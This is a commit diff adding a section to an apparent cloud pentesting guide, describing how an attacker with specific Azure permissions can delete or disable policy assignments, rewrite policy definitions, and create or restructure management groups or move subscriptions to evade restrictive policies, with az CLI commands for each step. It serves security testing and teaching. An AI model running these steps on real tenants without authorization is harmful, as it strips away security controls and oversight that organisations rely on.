pe - azure

carlospolop · carlospolop · commit 55afbe81c4e0 · 2025-11-28T10:42:46.000+01:00
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
@@ -81,6 +81,116 @@ az rest --method PUT \
   --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
 ```
 
+### Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete
+
+An attacker with the permission `Microsoft.Authorization/policyAssignments/write` or `Microsoft.Authorization/policyAssignments/delete` over a management group, subscription, or resource group can **modify or delete Azure policy assignments**, potentially **disabling security restrictions** that block specific operations.
+
+This allows access to resources or functionalities that were previously protected by the policy.
+
+**Delete a policy assignment:**
+
+```bash
+az policy assignment delete \
+    --name "<policyAssignmentName>" \
+    --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
+```
+
+**Disable a policy assignment:**
+
+```bash
+az policy assignment update \
+    --name "<policyAssignmentName>" \
+    --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
+    --enforcement-mode Disabled
+```
+
+**Verify the changes:**
+
+```bash
+# List policy assignments
+az policy assignment list \
+    --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
+
+# Show specific policy assignment details
+az policy assignment show \
+    --name "<policyAssignmentName>" \
+    --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
+```
+
+### Microsoft.Authorization/policyDefinitions/write
+
+An attacker with the permission `Microsoft.Authorization/policyDefinitions/write` can **modify Azure policy definitions**, changing the rules that control security restrictions across the environment.
+
+For example, a policy that limits the allowed regions for creating resources can be modified to allow any region, or the policy effect can be changed to make it ineffective.
+
+**Modify a policy definition:**
+
+```bash
+az policy definition update \
+    --name "<policyDefinitionName>" \
+    --rules @updated-policy-rules.json
+```
+
+**Verify the changes:**
+
+```bash
+az policy definition list --output table
+
+az policy definition show --name "<policyDefinitionName>"
+```
+
+### Microsoft.Management/managementGroups/write
+
+An attacker with the permission `Microsoft.Management/managementGroups/write` can **modify the hierarchical structure of management groups** or **create new management groups**, potentially evading restrictive policies applied at higher levels.
+
+For example, an attacker can create a new management group without restrictive policies and then move subscriptions to it.
+
+**Create a new management group:**
+
+```bash
+az account management-group create \
+    --name "yourMGname" \
+    --display-name "yourMGDisplayName"
+```
+
+**Modify a management group hierarchy:**
+
+```bash
+az account management-group update \
+    --name "<managementGroupId>" \
+    --parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"
+```
+
+**Verify the changes:**
+
+```bash
+az account management-group list --output table
+
+az account management-group show \
+    --name "<managementGroupId>" \
+    --expand
+```
+
+### Microsoft.Management/managementGroups/subscriptions/write
+
+An attacker with the permission `Microsoft.Management/managementGroups/subscriptions/write` can **move subscriptions between management groups**, potentially **evading restrictive policies** by moving a subscription to a group with less restrictive or no policies.
+
+**Move a subscription to a different management group:**
+
+```bash
+az account management-group subscription add \
+    --name "<managementGroupName>" \
+    --subscription "<subscriptionId>"
+```
+
+**Verify the changes:**
+
+```bash
+az account management-group subscription show \
+    --name "<managementGroupId>" \
+    --subscription "<subscriptionId>"
+```
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 
